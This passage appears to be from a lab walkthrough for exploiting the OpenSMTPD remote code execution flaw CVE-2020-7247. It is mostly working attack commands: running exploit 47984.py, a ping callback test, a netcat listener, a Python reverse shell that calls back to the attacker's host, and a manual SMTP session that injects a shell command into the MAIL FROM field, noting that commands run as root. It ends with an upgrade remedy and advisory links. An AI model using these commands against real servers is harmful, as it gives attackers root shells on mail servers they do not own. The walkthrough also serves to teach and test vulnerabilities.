2. This exploit will allow us to execute remote code. First make sure it is executable; otherwise, assign execute permissions

  • ls -l 47984.py
  • (OPTIONAL) chmod 777 47984.py

3. Since we are allowed to run commands, we will first run a ping test back to our machine. So first start a tcpdump capture waiting for ICMP traffic

  • sudo tcpdump -i tun0 icmp and src 192.168.161.71

4. Now, execute the exploit, and point the ping command to our local machine

  • python 47984.py 192.168.161.71 25 'ping -c 4 192.168.49.161'

5. Check the capture, and, confirm it captured ICMP traffic

6. Next we try to get access to the server; I'll try a reverse shell to port 80 because, after testing, this server didn't allow any other port

  • nc -lvp 80

7. Run the exploit with the reverse shell payload; I'll use python

  • python 47984.py 192.168.161.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.161\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'

8. Now check the listener, we should have a new session

  • whoami

Exploitation Manual

1. To exploit manually, we need to connect to the SMTP service using telnet

  • telnet 192.168.161.71 25

2. Since we will do a ping test we will start a capture on our local machine

  • sudo tcpdump -i tun0 icmp and src 192.168.161.71

3. In the SMTP session run the following commands (note the return code should be 250)

  • HELO x
  • MAIL FROM:<;ping -c 4 192.168.49.161;>
  • RCPT TO:<root>
  • DATA
  • <enter>
  • vry4n
  • .
  • QUIT

4. Look at the capture, we should now see some output

5. Instead of the ping command you can run any other command, such as a reverse shell or creating new users, as this runs as root

Remedy

Upgrade to the latest version of OpenSMTPD (6.6.2 or later)

Resources

https://exchange.xforce.ibmcloud.com/vulnerabilities/175213

https://seclists.org/bugtraq/2020/Jan/40

https://packetstormsecurity.com/files/156137

https://nvd.nist.gov/vuln/detail/CVE-2020-7247